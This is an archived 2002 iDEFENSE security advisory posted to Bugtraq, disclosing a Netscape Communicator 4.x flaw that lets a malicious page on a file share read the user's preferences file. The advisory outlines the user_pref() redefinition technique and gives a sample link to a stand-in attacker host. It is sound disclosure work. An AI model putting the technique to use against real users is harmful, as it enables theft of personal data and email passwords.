85220 2002-11-23 10:21 /108 rader/ David Endler <dendler@idefense.com> Importerad: 2002-11-23 10:21 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Externa svar till: dendler@idefense.com Mottagare: Bugtraq (import) <2498> Ärende: iDEFENSE Security Advisory 11.19.02c: Netscape Predictable Directory Structure Allows Theft of Preferences File ------------------------------------------------------------ -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDEFENSE Security Advisory 11.19.02c: http://www.idefense.com/advisory/11.19.02c.txt Predictable Directory Structure Allows Theft of Netscape Preferences File November 19, 2002 I. BACKGROUND Netscape Communications Corp.'s Communicator is a popular package that includes a web browser (Navigator), e-mail client, news client, and address book. II. DESCRIPTION Socially engineering users of Netscape Communicator 4.x's web browser and e-mail client into clicking on a malicious link could return the contents of the targeted user's preferences file back to a remote attacker. The attack involves the redefinition of user_pref(), which is an internal JavaScript function. The redefined function constructs a string of all user preferences stored in the hidden field of a form and later submitted by another JavaScript routine. In order for the redefinition to occur, an attacker must store the exploit script in a Windows (or Samba) share and coerce a victim into following a link to it. A sample link to an attack script would look like file:///attacker.example.com/thief.html. Communicator only allows local files to redefine internal functions. III. ANALYSIS Remote exploitation allows an attacker to steal user preferences, including the victim's real name, e-mail address, e-mail server, URL history and, in some cases, e-mail password. IV. DETECTION Netscape Communicator 4.x is vulnerable. Communicator 6 and later is not vulnerable, being it stores the prefs.js file in a randomized location. V. CVE INFORMATION The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1204 to this issue. VI. DISCLOSURE TIMELINE 08/29/2002 Issue disclosed to iDEFENSE 10/14/2002 Netscape notified (support@netscape.com, info@netscape.com, pradmin@netscape.com) 10/14/2002 iDEFENSE clients notified 10/31/2002 Second attempt at vendor contact 11/07/2002 Third attempt at vendor contact 11/19/2002 Public disclosure VII. CREDIT Bennett Haselton (bennett@peacefire.org) discovered this vulnerability. Get paid for security research http://www.idefense.com/contributor.html Subscribe to iDEFENSE Advisories: send email to listserv@idefense.com, subject line: "subscribe" About iDEFENSE: iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com. - -dave David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler@idefense.com www.idefense.com -----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A iQA/AwUBPdrFIUrdNYRLCswqEQJO8QCeLSkaHcdHYKxSR+4gP4b3gX8KADcAnj7p M0apHRqvhaWN4jthj57zhgNO =QPPR -----END PGP SIGNATURE----- (85220) /David Endler <dendler@idefense.com>/-------